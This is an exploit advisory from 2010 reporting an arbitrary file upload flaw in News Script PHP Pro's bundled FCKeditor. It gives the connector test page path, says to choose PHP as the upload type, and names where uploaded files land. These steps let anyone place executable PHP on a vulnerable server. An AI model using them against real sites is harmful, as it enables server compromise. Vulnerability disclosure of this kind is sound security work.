News Script PHP Pro - 'FCKeditor' Arbitrary File Upload

                                
==============================================================================
  
        [»] News Script PHP Pro (fckeditor) File Upload Vulnerability
  
==============================================================================
  
    [»] Title   :           [ News Script PHP Pro (fckeditor) File Upload Vulnerability ]
  
    [»] Script  :           [ News Script PHP Pro  ]
  
    [»] TestedON:           [ linux/php ]
  
    [»] Download:           [ http://newsscriptphp.com/ ]
  
    [»] Author  :           [ Net.Edit0r }
  
    [»] Email   :           [ black.hat.tm@gmail.com ]
  
    [»] Date    :           [ 2010-12-26 ]
   
    [»] Version :           [ Full Version ]

    [»] CVE     :           [Web Applications]
  
###########################################################################
  
     
===[ Exploit ]===    ./Iranian HackerZ
  
  [»] http://server/[patch]/fckeditor/editor/filemanager/connectors/uploadtest.html
  
  [»] Select the "File Upload" To use = php
 
===[ Upload To ]===
 
  [»] http://server/[patch]/userfiles/Name File
 
===[ Demo ]===

  [»] http://server/news/fckeditor/editor/filemanager/connectors/uploadtest.html
 
Greetz : HUrr!c4nE , H-SK33PY , Cair3x , B3hz4d , M4hd1 , Ali.Erroor 
 
     BHG : Net.Edit0r ~ Darkcoder ~ keracker
                                   
###########################################################################